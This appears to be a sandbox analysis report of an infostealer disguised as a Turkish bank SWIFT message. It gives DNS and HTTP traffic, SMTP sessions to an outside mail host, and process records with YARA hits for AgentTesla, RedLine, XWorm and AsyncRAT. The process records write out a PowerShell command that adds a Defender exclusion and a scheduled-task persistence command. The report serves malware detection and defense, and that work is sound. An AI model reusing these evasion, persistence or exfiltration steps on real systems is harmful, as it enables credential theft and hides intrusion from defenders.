Nov 26, 2024 09:01:26.487215996 CET	56311	53	192.168.2.5	1.1.1.1
Nov 26, 2024 09:01:26.627494097 CET	53	56311	1.1.1.1	192.168.2.5
Nov 26, 2024 09:01:28.356560946 CET	51400	53	192.168.2.5	1.1.1.1
Nov 26, 2024 09:01:28.500543118 CET	53	51400	1.1.1.1	192.168.2.5
Nov 26, 2024 09:01:31.402096033 CET	59112	53	192.168.2.5	1.1.1.1
Nov 26, 2024 09:01:31.620445013 CET	53	59112	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 09:01:24.460860968 CET	192.168.2.5	1.1.1.1	0xba5d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:26.487215996 CET	192.168.2.5	1.1.1.1	0x2735	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:28.356560946 CET	192.168.2.5	1.1.1.1	0x814d	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:31.402096033 CET	192.168.2.5	1.1.1.1	0xedf4	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 09:01:24.605420113 CET	1.1.1.1	192.168.2.5	0xba5d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 09:01:24.605420113 CET	1.1.1.1	192.168.2.5	0xba5d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:24.605420113 CET	1.1.1.1	192.168.2.5	0xba5d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:24.605420113 CET	1.1.1.1	192.168.2.5	0xba5d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:24.605420113 CET	1.1.1.1	192.168.2.5	0xba5d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:24.605420113 CET	1.1.1.1	192.168.2.5	0xba5d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:26.627494097 CET	1.1.1.1	192.168.2.5	0x2735	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:26.627494097 CET	1.1.1.1	192.168.2.5	0x2735	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:28.500543118 CET	1.1.1.1	192.168.2.5	0x814d	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:28.500543118 CET	1.1.1.1	192.168.2.5	0x814d	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:28.500543118 CET	1.1.1.1	192.168.2.5	0x814d	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 26, 2024 09:01:31.620445013 CET	1.1.1.1	192.168.2.5	0xedf4	No error (0)	s82.gocheapweb.com		51.195.88.199	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.ipify.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49717	193.122.6.168	80	2604	C:\Users\user\AppData\Local\Temp\XClient.exe

Timestamp	Bytes transferred	Direction	Data
Nov 26, 2024 09:01:24.749298096 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 26, 2024 09:01:26.061764002 CET	320	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 37e24a458f7f7299f47dd46971bbb010 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:01:26.067321062 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 26, 2024 09:01:26.482033014 CET	320	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 136f71bac2cba0b7124a8392497c589e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:01:34.027395010 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 26, 2024 09:01:34.459074974 CET	320	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6114b135a6d3ce3afc4d9bb1a15ea092 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:01:42.054054022 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 26, 2024 09:01:42.469501019 CET	320	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1b2d64bb4a52add1d6b13ef132878e97 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:01:50.338134050 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 26, 2024 09:01:50.752582073 CET	320	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:50 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 81490fd7db973646fd27f10450864922 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 26, 2024 09:01:57.581408978 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 26, 2024 09:01:57.996980906 CET	320	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:57 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4de76ce24b6db773231deae880c8ed59 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49726	172.67.177.134	443	2604	C:\Users\user\AppData\Local\Temp\XClient.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:01:28 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-26 08:01:28 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:28 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 571997 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BbVLUg4R6QgIznMXVbYJu8H4j2ORPslOY%2F2gB3N%2Bsf63GRANHqnrsG%2Fc8Elu11Fjw5mr9XB109iVM5z469u68LY9zH3RK0%2BqTPDuOn8AoM8%2Be0HSlzUnalyQTf90NwC2YCq7U%2F64"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8859c8ec21436e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1785932&cwnd=235&unsent_bytes=0&cid=1b7e561f96307853&ts=710&x=0"
2024-11-26 08:01:28 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49729	104.26.12.205	443	2604	C:\Users\user\AppData\Local\Temp\XClient.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:01:29 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-26 08:01:30 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 08:01:30 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e8859d27e2443ab-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1547429&cwnd=221&unsent_bytes=0&cid=1e2efe63d9a827c9&ts=450&x=0"
2024-11-26 08:01:30 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 26, 2024 09:01:33.099947929 CET	587	49741	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 08:01:32 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 09:01:33.100820065 CET	49741	587	192.168.2.5	51.195.88.199	EHLO 688098
Nov 26, 2024 09:01:33.518156052 CET	587	49741	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 688098 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 09:01:33.518600941 CET	49741	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 09:01:33.936918974 CET	587	49741	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 09:01:36.042651892 CET	587	49748	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 08:01:35 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 09:01:36.042870998 CET	49748	587	192.168.2.5	51.195.88.199	EHLO 688098
Nov 26, 2024 09:01:36.452692032 CET	587	49748	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 688098 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 09:01:36.453722000 CET	49748	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 09:01:36.864569902 CET	587	49748	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 09:01:40.424351931 CET	587	49762	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 08:01:40 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 09:01:40.424654007 CET	49762	587	192.168.2.5	51.195.88.199	EHLO 688098
Nov 26, 2024 09:01:40.838531017 CET	587	49762	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 688098 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 09:01:40.858211040 CET	49762	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 09:01:41.272459984 CET	587	49762	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 09:01:44.307792902 CET	587	49769	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 08:01:44 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 09:01:44.308063030 CET	49769	587	192.168.2.5	51.195.88.199	EHLO 688098
Nov 26, 2024 09:01:44.725702047 CET	587	49769	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 688098 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 09:01:44.725858927 CET	49769	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 09:01:45.143908024 CET	587	49769	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 09:01:52.928025961 CET	587	49792	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 08:01:52 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 09:01:52.928185940 CET	49792	587	192.168.2.5	51.195.88.199	EHLO 688098
Nov 26, 2024 09:01:53.328847885 CET	587	49792	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 688098 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 09:01:53.329056025 CET	49792	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 09:01:53.730020046 CET	587	49792	51.195.88.199	192.168.2.5	220 TLS go ahead
Nov 26, 2024 09:01:59.781232119 CET	587	49809	51.195.88.199	192.168.2.5	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 08:01:59 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 26, 2024 09:01:59.810846090 CET	49809	587	192.168.2.5	51.195.88.199	EHLO 688098
Nov 26, 2024 09:02:00.224988937 CET	587	49809	51.195.88.199	192.168.2.5	250-s82.gocheapweb.com Hello 688098 [8.46.123.75] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 26, 2024 09:02:00.225156069 CET	49809	587	192.168.2.5	51.195.88.199	STARTTLS
Nov 26, 2024 09:02:00.639564037 CET	587	49809	51.195.88.199	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	03:01:08
Start date:	26/11/2024
Path:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Imagebase:	0x850000
File size:	840'704 bytes
MD5 hash:	7C36F1554BB662ABDDB2FAFB5DB3037D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2144967005.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2148223816.0000000006F90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:01:09
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"
Imagebase:	0x910000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:01:09
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:01:09
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp"
Imagebase:	0x980000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:01:09
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:01:10
Start date:	26/11/2024
Path:	C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"
Imagebase:	0xd40000
File size:	840'704 bytes
MD5 hash:	7C36F1554BB662ABDDB2FAFB5DB3037D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2130198719.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2130198719.0000000004164000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2130198719.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2129069738.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:01:11
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\XClient.exe"
Imagebase:	0x8c0000
File size:	41'472 bytes
MD5 hash:	1C5CF825E29B63A62C3C8B1589D51A1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000000.2119570575.00000000008C2000.00000002.00000001.01000000.0000000C.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000008.00000002.2940708264.000000001D020000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.2942525040.000000001D380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2652391836.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs Detection: 68%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:01:11
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Local\Temp\build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\build.exe"
Imagebase:	0x590000
File size:	307'712 bytes
MD5 hash:	1ED2ECAE05AAA1C505136F5252287CC7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000000.2120832413.0000000000592000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs Detection: 75%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:01:12
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
Wow64 process (32bit):	true
